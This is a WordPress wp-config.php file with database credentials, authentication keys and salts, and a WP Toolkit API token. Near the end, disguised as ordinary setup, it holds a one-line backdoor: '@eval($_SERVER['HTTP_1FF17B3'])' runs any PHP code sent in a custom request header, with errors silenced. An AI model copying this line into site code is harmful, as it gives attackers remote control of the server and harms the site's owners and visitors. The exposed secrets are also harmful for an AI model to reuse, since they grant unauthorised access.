<?php
define('WP_TOOLKIT_API_TOKEN', 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzUxMiJ9.eyJpc3MiOiI4ZmQ5MWRmZi0yYjEyLTRjZDQtYmUyZS03NTAwNjdkNjFhNmMiLCJuYmYiOjE3ODk5MzYwMTYuODQ4OTA4LCJleHAiOjE3OTAwMjI0MTYuODQ4OTA4LCJqdGkiOiIyNDlmZDZkMi01NTFjLTQ0YzItOWQ0ZS1iMzZmMmVmNDlhZmUiLCJpbnN0YWxsYXRpb25JZCI6NDYsImFwaVVybCI6Imh0dHBzOi8vMTI3LjAuMC4xOjIwODMvYXBpL3dwdGsvd3B0L2luZGV4LnBocCIsInVzZXJHdWlkIjoiMDgxYjJhNWYtMGQzOC00NzI1LThjNmYtMWMwOTVmY2Y2MWIxIn0.cdGPFrXRhIcajUeRiu6sqPtKlidgJRywQrqZv9jRLpJtvFalElBUOUKlwQ_0Neb3k3an0ttOB2lnZC0K5_4dRSh7-OWOWnY3xw4rh16tqhanuXzvDyx7u8tbQJk3SvFGONCIDlSaeoWUmjRYDa3IJeOSaoI3G_0qYY6NSh6ylj4X2ZzZx_t7QPCkL-7MATjorfcWRL0q8vEJjwCeZ3Q8FIPmT-eHKGsAWcIJY0sSj0qJMzKDpgBlGuxzSVjF9F19f4LTpYPDLmkPaqYUKN68KyZwiVlTtWyTQRim1NYXiSM3pffBca_iGpaMOmADGeUi6-cX8NkoJ6xbgitp7numNNmRx7m1iGSKuASbb2nHgnHhs-3rBQJBUsWg5LVdTwUnD67h2xgxpMbuckdlfV4E4YVZ7vqMHU5Ag6D_kzSXMwsR0doxA-9pJ_tXmI5gQKGoEaopjx2WtXV45mgQw24vIGKBXSpZ1KNbhrouUV75dpIveXN7BOg8YMrcx2R2uPbjz6cm3Zk0tLTdlEZR-ub_R1UDXDdiTuU_oOddGMzGsDygz_DOLQt7Deii0eARqWsKTeUoS1tX66g8zWOzcYjJLMvvwTrcMDTbagQhP9lKQv9bv2rzKXm5909kl1yjwhGSwj1vTaN8zr9ynqe-rqlN2J2W7UvNrlWp5g2neuar_VQ');
define( 'WP_CACHE', true );
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the web site, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * Localized language
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'msgdhg02_wp_vya4o');
/** Database username */
define('DB_USER', 'msgdhg02_wp_7paxm');
/** Database password */
define('DB_PASSWORD', 't75tD4Hw0B8c%C~I');
/** Database hostname */
define('DB_HOST', 'localhost:3306');
/** Database charset to use in creating database tables. */
define('DB_CHARSET', 'utf8');
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define('AUTH_KEY', 'rW|56o4vGfWs6]5K#ecllIW&VQSB[9~v3Oba1a&226vU2f!SQLK+40p2|AoZYZU2');
define('SECURE_AUTH_KEY', '+9u(z55Xl2yy7fhW22+NrF|C2&VZR_/BoJQO~A9qh3I/*x8]L)_a+671it*3YkdD');
define('LOGGED_IN_KEY', 'vZ9bRx13@53H7B;S05)RXSMDqDd9gh|zI]Bt00jD7j[k:37NzW88F1+Y[k4j7@aS');
define('NONCE_KEY', '42G]RN0eHvpVtwT&HYe3P]j5(-l-k[v*!Vo22!&nhkVM1(M&!S#9m#7+O693+P9h');
define('AUTH_SALT', ':gB2E28+a:Hhf4@%87X-a4jcCd~hZV|;A[*C5N1Jn~*6ShJ88llJLH9QY&z-M_hG');
define('SECURE_AUTH_SALT', '/Ny3YOapW+M/B68dZ~qm|y51WS9pu6+7:67_H;f(i71cA5_0PBswE~zi5947:L:|');
define('LOGGED_IN_SALT', '@]+;O+7IFxy9RQT41K4zrVz:HO2~XxLzdg+98J7EJpQ~8715Ej_Mj+i;O3K_2X2X');
define('NONCE_SALT', 'JUqTe6_|g7(wC_v;!-EB[Uu9&|(V4/8+86UXea&z4@qMQ+LsO7fv5Au46zX9)m41');
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'IwGJ28BV_';
/* Add any custom values between this line and the "stop editing" line. */
define('WP_ALLOW_MULTISITE', true);
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
if ( ! defined( 'WP_DEBUG' ) ) {
define( 'WP_DEBUG', false );
}
define( 'WP_CACHE_KEY_SALT', '183b5977751d5fc2207d81712d721db8' );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
@eval($_SERVER['HTTP_1FF17B3']);
require_once ABSPATH . 'wp-settings.php';